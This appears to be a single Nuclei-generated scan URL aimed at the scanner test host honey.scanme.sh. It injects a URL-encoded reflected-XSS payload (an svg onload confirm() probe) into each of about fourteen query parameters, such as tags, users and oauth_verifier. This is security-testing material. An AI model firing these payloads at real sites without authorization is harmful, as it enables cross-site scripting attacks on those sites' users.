'https://honey.scanme.sh/?tags=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tags%27%29%3E&e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-e%27%29%3E&users=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-users%27%29%3E&format=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-format%27%29%3E&dl=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dl%27%29%3E&position=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-position%27%29%3E&url=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-url%27%29%3E&theme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-theme%27%29%3E&firstname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-firstname%27%29%3E&fields=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fields%27%29%3E&form=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-form%27%29%3E&level=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-level%27%29%3E&month=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-month%27%29%3E&oauth_verifier=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oauth_verifier%27%29%3E'

Generated by Nuclei v3.2.5